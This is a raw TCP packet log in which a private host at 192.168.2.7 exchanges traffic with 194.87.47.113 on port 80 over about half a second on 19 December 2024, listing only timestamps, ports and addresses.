Dec 19, 2024 08:47:34.615506887 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.616475105 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.616543055 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.616636038 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.617007017 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.617208958 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.617347002 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.617662907 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.617738962 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.618036985 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.618416071 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.618489981 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.621248007 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.621346951 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.621601105 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.621619940 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.621810913 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.621870995 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.622194052 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.622562885 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.622658968 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.622983932 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.623181105 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.623275042 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.623827934 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.624042034 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.624119043 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.624660015 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.624845982 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.624902010 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.625474930 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.625616074 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.625674009 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.626188993 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.626311064 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.626553059 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.626571894 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.627060890 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.627144098 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.627526999 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.627892017 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.627957106 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.628237963 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.628650904 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.628772020 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.628796101 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.629060030 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.629255056 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.629740953 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.629837036 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.629949093 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.630407095 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.630585909 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.630719900 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.631237030 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.631434917 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.631496906 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.632050037 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.632287979 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.632337093 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.632875919 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.633146048 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.633228064 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.633635998 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.633794069 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.633887053 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.634454012 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.634674072 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.634737968 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.635221958 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.635355949 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.635432005 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.635927916 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.636152029 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.636240005 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.636774063 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.637061119 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.637120008 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.637551069 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.637748003 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.637820005 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.638463974 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.638566017 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.638634920 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.639194012 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.639350891 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.639451981 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.640013933 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.640166044 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.640259981 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.640727997 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.640965939 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.641062975 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.641562939 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.641882896 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.641926050 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.642309904 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.642573118 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.642631054 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.643079996 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.643364906 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.643466949 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.643879890 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.644190073 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.644237041 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.644706964 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.644911051 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.645086050 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.645498991 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.645698071 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.645751953 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.646394014 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.646411896 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.646465063 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.647064924 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.647231102 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.647284985 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.647820950 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.648032904 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.648185015 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.648675919 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.648811102 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.648956060 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.649437904 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.649638891 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.649707079 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.650274992 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.650618076 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.650696993 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.650998116 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.651319981 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.651356936 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.651765108 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.652040005 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.652108908 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.652673006 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.653081894 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.653259039 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.653379917 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.653759003 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.653888941 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.654185057 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.654438972 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.654505968 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.655073881 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.655126095 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.655216932 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.655786037 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.655981064 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.656054020 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.656507015 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.656743050 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.656837940 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.657345057 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.671658993 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.805779934 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.805881977 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.805938959 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.806008101 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.806263924 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.806513071 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.806642056 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.806987047 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.807074070 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.807626963 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.807790995 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.807862997 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.808495045 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.808691025 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.808737040 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.809070110 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.809391975 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.809498072 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.809745073 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.810074091 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.810159922 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.810512066 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.813816071 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.813930035 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.813996077 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.814357042 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.814543009 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.814707041 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.815042973 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.815088034 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.815391064 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.815793991 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.815887928 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.816103935 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.816586018 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.816673994 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.816778898 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.817423105 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.817482948 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.817555904 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.818192005 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.818229914 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.818308115 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.818658113 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.818835974 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.819092989 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.819458961 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.819571018 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.819628000 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.820250988 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.820424080 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.820434093 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.821019888 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.821064949 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.821343899 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.821526051 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.821577072 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.822081089 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.822278023 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.822326899 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.822868109 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.823055029 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.823334932 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.823724985 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.823849916 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.823892117 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.824454069 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.824666023 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.824707985 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.825233936 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.825417995 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.825474977 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.826150894 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.826320887 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.826536894 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.826536894 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.826993942 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.827116013 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.827169895 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.827621937 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.827805042 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.827867031 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.828533888 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.828738928 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.828792095 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.829196930 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.829385996 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.829432964 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.829986095 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.830173969 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.830281019 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.830810070 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.830976963 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.831064939 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.831574917 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.831742048 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.831887960 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.832396984 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.832645893 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.832925081 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.833153963 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.833348989 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.833399057 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.833942890 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.834136009 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.834260941 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.834731102 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.834928036 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.835059881 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.835522890 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.835721016 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.835832119 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.836322069 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.836519003 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.836572886 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.837142944 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.837317944 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.837433100 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.837894917 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.838093042 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.838247061 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.838779926 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.838923931 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.839040995 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.839514017 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.839670897 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.839732885 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.839917898 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.840357065 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.840468884 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.840533972 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.841111898 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.841265917 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.841339111 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.841854095 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.842067003 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.842116117 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.842639923 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.842860937 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.843090057 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.843441963 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.843637943 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.843848944 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.844252110 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.844434023 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.844490051 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.845060110 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.845247984 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.845310926 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.845849037 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.846031904 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.846149921 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.846647978 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.846813917 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.847103119 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.847409010 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.847649097 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.847711086 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.848190069 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.848400116 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.848443031 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.848989964 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.849205017 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.849209070 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.849275112 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.849798918 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.858278036 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.997899055 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.998069048 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.998178959 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.998394012 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.998747110 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.998823881 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.999092102 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.999490023 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.999546051 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.999808073 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.000838041 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.000967979 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.000971079 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.001326084 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.001456022 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.001677036 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.002026081 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.002074003 CET	49707	80	192.168.2.7	194.87.47.113
